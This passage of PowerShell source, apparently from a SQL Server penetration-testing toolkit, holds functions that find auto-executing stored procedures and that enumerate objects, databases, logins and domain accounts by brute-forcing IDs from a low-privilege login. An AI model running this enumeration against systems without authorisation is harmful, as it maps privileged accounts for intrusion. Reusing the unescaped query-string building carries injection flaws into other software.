Get-SQLStoredProcedureAutoExec\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLStoredProcedureAutoExec\n{\n    <#\n            .SYNOPSIS\n            Returns stored procedures from target SQL Servers.\n            Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER ProcedureName\n            Procedure name to filter for.\n            .PARAMETER Keyword\n            Filter for procedures that include the keyword.\n            .EXAMPLE\n            PS C:\\> Get-SQLStoredProcedureAutoExec -Instance SQLServer1\\STANDARDDEV2014 -NoDefaults -DatabaseName testdb\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            DatabaseName        : testdb\n            SchemaName          : dbo\n            ProcedureName       : MyTestProc\n            ProcedureType       : PROCEDURE\n            ProcedureDefinition : CREATE PROC MyTestProc\n                                  WITH EXECUTE AS OWNER\n                                  as\n                                  begin\n                                  select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin\n                                  end\n            SQL_DATA_ACCESS     : MODIFIES\n            ROUTINE_BODY        : SQL\n            CREATED             : 7/24/2016 3:16:29 PM\n            LAST_ALTERED        : 7/24/2016 3:16:29 PM\n            is_ms_shipped       : False\n            is_auto_executed    : TRUE\n\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLStoredProcedureAutoExec -Verbose -NoDefaults\n    #>\n\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Procedure name.')]\n        [string]$ProcedureName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Filter for procedures that include the keyword.')]\n        [string]$Keyword,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblProcs = New-Object -TypeName System.Data.DataTable\n\n        # Setup routine name filter\n        if ($ProcedureName)\n        {\n            $ProcedureNameFilter = \" AND ROUTINE_NAME like '$ProcedureName'\"\n        }\n        else\n        {\n            $ProcedureNameFilter = ''\n        }\n\n        # Setup ROUTINE_DEFINITION filter\n        if ($Keyword)\n        {\n            $KeywordFilter = \" AND ROUTINE_DEFINITION like '%$Keyword%'\"\n        }\n        else\n        {\n            $KeywordFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse ComputerName\n        If ($Instance)\n        {\n            $ComputerName = $Instance.split('\\')[0].split(',')[0]\n            $Instance = $Instance\n        }\n        else\n        {\n            $ComputerName = $env:COMPUTERNAME\n            $Instance = '.\\'\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Checking for autoexec stored procedures...\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get role for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            # Define Query\n            $Query = \"  use [master];\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                ROUTINE_CATALOG AS [DatabaseName],\n                ROUTINE_SCHEMA AS [SchemaName],\n                ROUTINE_NAME as [ProcedureName],\n                ROUTINE_TYPE as [ProcedureType],\n                ROUTINE_DEFINITION as [ProcedureDefinition],\n                SQL_DATA_ACCESS,\n                ROUTINE_BODY,\n                CREATED,\n                LAST_ALTERED,\n                b.is_ms_shipped,\n                b.is_auto_executed\n                FROM [INFORMATION_SCHEMA].[ROUTINES] a\n                JOIN [sys].[procedures]  b\n                ON a.ROUTINE_NAME = b.name\n                WHERE 1=1\n                AND is_auto_executed = 1\n                $ProcedureNameFilter\n                $KeywordFilter\"\n\n            # Execute Query\n            $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n            if(-not $TblProcsTemp){\n                #Write-Verbose -Message \"$Instance : No autoexec procedures found.\"\n            }\n\n            # Append results\n            $TblProcs = $TblProcs + $TblProcsTemp\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblProcs\n    }\n}\n\n\n#endregion\n\n#########################################################################\n#\n#region          UTILITY FUNCTIONS\n#\n#########################################################################\n\n# ----------------------------------\n#  Get-SQLFuzzObjectName\n# ----------------------------------\n# Author: Scott Sutherland\n# Reference: https://raresql.com/2013/01/29/sql-server-all-about-object_id/\n# Reference: https://social.technet.microsoft.com/Forums/forefront/en-US/f73c2115-57f7-4cec-a95b-00c2d8252ace/objectid-recycled-?forum=transactsql\nFunction  Get-SQLFuzzObjectName\n{\n    <#\n            .SYNOPSIS\n            Enumerates objects based on object id using OBJECT_NAME() and only the Public role.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER StartId\n            Principal ID to start fuzzing with.\n            .PARAMETER EndId\n            Principal ID to stop fuzzing with.\n            .EXAMPLE\n            PS C:\\> Get-SQLFuzzObjectName -Instance SQLServer1\\STANDARDDEV2014 | Select-Object -First 5\n\n            ComputerName   Instance                       ObjectId ObjectName\n            ------------   --------                       -------- ----------\n            SQLServer1     SQLServer1\\STANDARDDEV2014     3        sysrscols\n            SQLServer1     SQLServer1\\STANDARDDEV2014     5        sysrowsets\n            SQLServer1     SQLServer1\\STANDARDDEV2014     6        sysclones\n            SQLServer1     SQLServer1\\STANDARDDEV2014     7        sysallocunits\n            SQLServer1     SQLServer1\\STANDARDDEV2014     8        sysfiles1\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Principal ID to start fuzzing with.')]\n        [string]$StartId = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Principal ID to stop fuzzing on.')]\n        [string]$EndId = 300,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblFuzzedObjects = New-Object -TypeName System.Data.DataTable\n    }\n\n    Process\n    {\n        # All user defined objects are assigned a positive object ID plus system tables.\n        # Apart from these objects, the rest of the system objects are assigned negative object IDs.\n        # This object_id comes from the primary key of system table sys.sysschobjs.The column name is id, int  data type and it is not an identity column\n        # If you create a new object in the database, the first ID will always be 2073058421 in SQL SERVER 2005 and 245575913 in SQL SERVER 2012.\n        # The object_ID increment counter for user defined objects will add 16000057 + Last user defined object_ID and will give you a new ID.\n        <# IThis object_id comes from the primary key of system table sys.sysschobjs. The new object_id will increase 16000057 (a prime number) from\n                last object_id. When the last object_id +16000057 is over the int maximum ( 2147483647), it will start with a new number before the difference\n                between the new bigint number and the maximum int. This cycle will generate 134 or 135 new object_id for each cycle. The system has a maximum\n                number of objects,  which is 2147483647.\n                The object ID is only unique within each database.\n        #>\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Enumerating objects from object IDs...\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Fuzz from StartId to EndId\n        $StartId..$EndId |\n        ForEach-Object -Process {\n            # Define Query\n            $Query = \"SELECT    '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$_' as [ObjectId],\n            OBJECT_NAME($_) as [ObjectName]\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            $ObjectName = $TblResults.ObjectName\n            if( -not $SuppressVerbose)\n            {\n                if($ObjectName.length -ge 2)\n                {\n                    Write-Verbose -Message \"$Instance : - Object ID $_ resolved to: $ObjectName\"\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : - Object ID $_ resolved to: \"\n                }\n            }\n\n            # Append results\n            $TblFuzzedObjects = $TblFuzzedObjects + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblFuzzedObjects | Where-Object -FilterScript {\n            $_.ObjectName.length -ge 2\n        }\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLFuzzDatabaseName\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLFuzzDatabaseName\n{\n    <#\n            .SYNOPSIS\n            Enumerates databases based on database id using DB_NAME() and only the Public role.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER StartId\n            Principal ID to start fuzzing with.\n            .PARAMETER EndId\n            Principal ID to stop fuzzing with.\n            .EXAMPLE\n            PS C:\\> Get-SQLFuzzDatabaseName -Instance SQLServer1\\STANDARDDEV2014 | Select-Object -First 5\n\n            ComputerName   Instance                       DatabaseId DatabaseName\n            ------------   --------                       ---------- ------------\n            SQLServer1     SQLServer1\\STANDARDDEV2014     1          master\n            SQLServer1     SQLServer1\\STANDARDDEV2014     2          tempdb\n            SQLServer1     SQLServer1\\STANDARDDEV2014     3          model\n            SQLServer1     SQLServer1\\STANDARDDEV2014     4          msdb\n            SQLServer1     SQLServer1\\STANDARDDEV2014     5          ReportServer$STANDARDDEV2014\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Principal ID to start fuzzing with.')]\n        [string]$StartId = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Principal ID to stop fuzzing on.')]\n        [string]$EndId = 300,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblFuzzedDbs = New-Object -TypeName System.Data.DataTable\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Enumerating database names from database IDs...\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Fuzz from StartId to EndId\n        $StartId..$EndId |\n        ForEach-Object -Process {\n            # Define Query\n            $Query = \"SELECT    '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$_' as [DatabaseId],\n            DB_NAME($_) as [DatabaseName]\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            $DatabaseName = $TblResults.DatabaseName\n            if($DatabaseName.length -ge 2)\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : - ID $_ - Resolved to: $DatabaseName\"\n                }\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : - ID $_ - Resolved to:\"\n                }\n            }\n\n            # Append results\n            $TblFuzzedDbs = $TblFuzzedDbs + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblFuzzedDbs | Where-Object -FilterScript {\n            $_.DatabaseName.length -ge 2\n        }\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLFuzzServerLogin\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLFuzzServerLogin\n{\n    <#\n            .SYNOPSIS\n            Enumerates SQL Server Logins based on login id using SUSER_NAME() and only the Public role.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER StartId\n            Principal ID to start fuzzing with.\n            .PARAMETER EndId\n            Principal ID to stop fuzzing with.\n            .PARAMETER GetRole\n            Checks if the principal name is a role, SQL login, or Windows account.\n            .EXAMPLE\n            PS C:\\> Get-SQLFuzzServerLogin -Instance SQLServer1\\STANDARDDEV2014 -StartId 1 -EndId 500 | Select-Object -First 40\n\n            ComputerName   Instance                       PrincipalId PrincipleName\n            ------------   --------                       ----------  -------------\n            SQLServer1     SQLServer1\\STANDARDDEV2014     1           sa\n            SQLServer1     SQLServer1\\STANDARDDEV2014     2           public\n            SQLServer1     SQLServer1\\STANDARDDEV2014     3           sysadmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     4           securityadmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     5           serveradmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     6           setupadmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     7           processadmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     8           diskadmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     9           dbcreator\n            SQLServer1     SQLServer1\\STANDARDDEV2014     10          bulkadmin\n            SQLServer1     SQLServer1\\STANDARDDEV2014     101         ##MS_SQLResourceSigningCertificate##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     102         ##MS_SQLReplicationSigningCertificate##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     103         ##MS_SQLAuthenticatorCertificate##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     105         ##MS_PolicySigningCertificate##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     106         ##MS_SmoExtendedSigningCertificate##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     121         ##Agent XPs##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     122         ##SQL Mail XPs##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     123         ##Database Mail XPs##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     124         ##SMO and DMO XPs##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     125         ##Ole Automation Procedures##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     126         ##Web Assistant Procedures##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     127         ##xp_cmdshell##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     128         ##Ad Hoc Distributed Queries##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     129         ##Replication XPs##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     257         ##MS_PolicyTsqlExecutionLogin##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     259         Domain\\User\n            SQLServer1     SQLServer1\\STANDARDDEV2014     260         NT SERVICE\\SQLWriter\n            SQLServer1     SQLServer1\\STANDARDDEV2014     261         NT SERVICE\\Winmgmt\n            SQLServer1     SQLServer1\\STANDARDDEV2014     262         NT Service\\MSSQL$STANDARDDEV2014\n            SQLServer1     SQLServer1\\STANDARDDEV2014     263         NT AUTHORITY\\SYSTEM\n            SQLServer1     SQLServer1\\STANDARDDEV2014     264         NT SERVICE\\SQLAgent$STANDARDDEV2014\n            SQLServer1     SQLServer1\\STANDARDDEV2014     265         NT SERVICE\\ReportServer$STANDARDDEV2014\n            SQLServer1     SQLServer1\\STANDARDDEV2014     266         ##MS_PolicyEventProcessingLogin##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     267         ##MS_AgentSigningCertificate##\n            SQLServer1     SQLServer1\\STANDARDDEV2014     268         MySQLUser1\n            SQLServer1     SQLServer1\\STANDARDDEV2014     270         MySQLUser2\n            SQLServer1     SQLServer1\\STANDARDDEV2014     271         MySQLUser3\n            SQLServer1     SQLServer1\\STANDARDDEV2014     272         MySysadmin1\n            SQLServer1     SQLServer1\\STANDARDDEV2014     273         Domain\\User2\n            SQLServer1     SQLServer1\\STANDARDDEV2014     274         MySysadmin2\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of Principal IDs to fuzz.')]\n        [string]$FuzzNum = 10000,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Try to determine if the principal type is role, SQL login, or Windows account via error analysis of sp_defaultdb.')]\n        [switch]$GetPrincipalType,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblFuzzedLogins = New-Object -TypeName System.Data.DataTable\n        $null = $TblFuzzedLogins.Columns.add('ComputerName')\n        $null = $TblFuzzedLogins.Columns.add('Instance')\n        $null = $TblFuzzedLogins.Columns.add('PrincipalId')\n        $null = $TblFuzzedLogins.Columns.add('PrincipleName')\n        if($GetPrincipalType)\n        {\n            $null = $TblFuzzedLogins.Columns.add('PrincipleType')\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Enumerating principal names from principal IDs..\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        # Reference: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7\n        $Query = \"\n                SELECT \n                '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                n [PrincipalId], SUSER_NAME(n) as [PrincipleName]\n                from ( \n                select top $FuzzNum row_number() over(order by t1.number) as N\n                from   master..spt_values t1 \n                       cross join master..spt_values t2\n                ) a\n                where SUSER_NAME(n) is not null\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Process results\n        $TblResults |\n        ForEach-Object {\n\n            # check if principal is role, sql login, or windows account\n            $PrincipalName = $_.PrincipleName\n            $PrincipalId = $_.PrincipalId\n\n            if($GetPrincipalType)\n            {\n                $RoleCheckQuery = \"EXEC master..sp_defaultdb '$PrincipalName', 'NOTAREALDATABASE1234ABCD'\"\n                $RoleCheckResults = Get-SQLQuery -Instance $Instance -Query $RoleCheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -ReturnError\n\n                # Check the error message for a signature that means the login is real\n                if (($RoleCheckResults -like '*NOTAREALDATABASE*') -or ($RoleCheckResults -like '*alter the login*'))\n                {\n\n                    if($PrincipalName -like '*\\*')\n                    {\n                        $PrincipalType = 'Windows Account'\n                    }\n                    else\n                    {\n                        $PrincipalType = 'SQL Login'\n                    }\n                }\n                else\n                {\n                    $PrincipalType = 'SQL Server Role'\n                }\n            }\n\n            # Add to result set\n            if($GetPrincipalType)\n            {\n                $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName, $PrincipalType)\n            }\n            else\n            {\n                $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName)\n            }\n\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblFuzzedLogins | Where-Object -FilterScript {\n            $_.PrincipleName.length -ge 2\n        }\n        \n        if( -not $SuppressVerbose)\n        {\n            Write-Verbose -Message \"$Instance : Complete.\"\n        }\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLFuzzDomainAccount\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLFuzzDomainAccount\n{\n    <#\n            .SYNOPSIS\n            Enumerates domain groups, computer accounts, and user accounts based on domain RID using SUSER_SNAME() and only the Public role.\n            Note: In a typical domain 10000 or more is recommended for the EndId.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Domain\n            Set a custom domain for user enumeration. Typically used to target trusted domains.\n            .PARAMETER StartId\n            RID to start fuzzing with.\n            .PARAMETER EndId\n            RID to stop fuzzing with.\n            .EXAMPLE\n            PS C:\\> Get-SQLFuzzDomainAccount -Instance SQLServer1\\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500 -Domain TrustedDomainName\n            .EXAMPLE\n            PS C:\\> Get-SQLFuzzDomainAccount -Instance SQLServer1\\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500\n\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Enumerating Domain accounts from the SQL Server's default domain...\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f4010000 (500) Resolved to: Domain\\Administrator\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f5010000 (501) Resolved to: Domain\\Guest\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f6010000 (502) Resolved to: Domain\\krbtgt\n            [TRUNCATED]\n\n            ComputerName   Instance                       DomainAccount\n            ------------   --------                       -------------\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Administrator\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Guest\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\krbtgt\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Domain Guests\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Domain Computers\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Domain Controllers\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Cert Publishers\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Schema Admins\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Enterprise Admins\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Group Policy Creator Owners\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Read-only Domain Controllers\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Cloneable Domain Controllers\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Protected Users\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\RAS and IAS Servers\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Allowed RODC Password Replication Group\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\Denied RODC Password Replication Group\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\HelpServicesGroup\n\n            [TRUNCATED]\n\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\MyUser\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\MyDAUser\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Domain\\MyEAUser\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Principal ID to start fuzzing with.')]\n        [string]$StartId = 500,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Principal ID to stop fuzzing on.')]\n        [string]$EndId = 1000,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Set a custom domain for user enumeration. Typically used to target trusted domains.')]\n        [string]$Domain,\n        \n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblFuzzedAccounts = New-Object -TypeName System.Data.DataTable\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"                \n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Grab server and domain information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $ComputerName = $ServerInfo.ComputerName\n        $Instance = $ServerInfo.Instance\n        if(-not $Domain){\n            $Domain = $ServerInfo.DomainName\n        }\n\n        # Status the user\n        Write-Verbose 